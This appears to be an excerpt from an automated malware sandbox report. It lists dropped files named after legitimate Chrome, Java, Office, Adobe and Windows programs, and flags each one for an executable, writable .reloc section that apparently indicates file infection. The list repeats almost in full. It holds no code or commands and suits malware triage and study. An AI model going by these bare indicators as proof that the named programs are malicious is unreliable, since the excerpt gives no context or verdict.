                        Source: private_browsing.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: updater.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: Au3Info.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: Au3Info_x64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AutoIt3Help.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AutoIt3_x64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: appvcleaner.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: SciTE.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AppVShNotify.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: IntegratedOffice.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: MavInject32.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: OfficeC2RClient.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: officesvcmgr.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: chrome_pwa_launcher.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: chrmstp.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AppVClient.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: DiagnosticsHub.StandardCollector.Service.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AdobeARMHelper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: jaureg.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: jucheck.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: jusched.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: java.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: javaw.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: javaws.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleCrashHandler.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: alg.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleCrashHandler64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: FXSSVC.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: elevation_service.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: elevation_service.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdateBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdateComRegisterShell64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdateCore.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdateOnDemand.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: 117.0.5938.132_chrome_installer.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: jabswitch.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: java-rmi.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: java.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: javacpl.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: javaw.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: maintenanceservice.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: msdtc.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: msiexec.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: PerceptionSimulationService.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: perfhost.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: javaws.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: jjs.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: jp2launcher.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: keytool.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: kinit.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: klist.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: ktab.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: orbd.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: pack200.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: armsvc.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: ShowAppPickerForPDF.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: Acrobat.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: private_browsing.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: updater.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: Au3Info.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: Au3Info_x64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AutoIt3Help.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AutoIt3_x64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: appvcleaner.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: SciTE.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AppVShNotify.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: IntegratedOffice.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: MavInject32.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: OfficeC2RClient.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: officesvcmgr.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: chrome_pwa_launcher.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: chrmstp.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AppVClient.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: DiagnosticsHub.StandardCollector.Service.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AdobeARMHelper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: jaureg.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: jucheck.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: jusched.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: java.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: javaw.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: javaws.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleCrashHandler.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: alg.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleCrashHandler64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: FXSSVC.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: elevation_service.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: elevation_service.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdateBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdateComRegisterShell64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdateCore.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdateOnDemand.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: 117.0.5938.132_chrome_installer.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: jabswitch.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: java-rmi.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: java.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: javacpl.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: javaw.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: maintenanceservice.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: msdtc.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: msiexec.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: PerceptionSimulationService.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: perfhost.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: javaws.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: jjs.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: jp2launcher.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: keytool.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
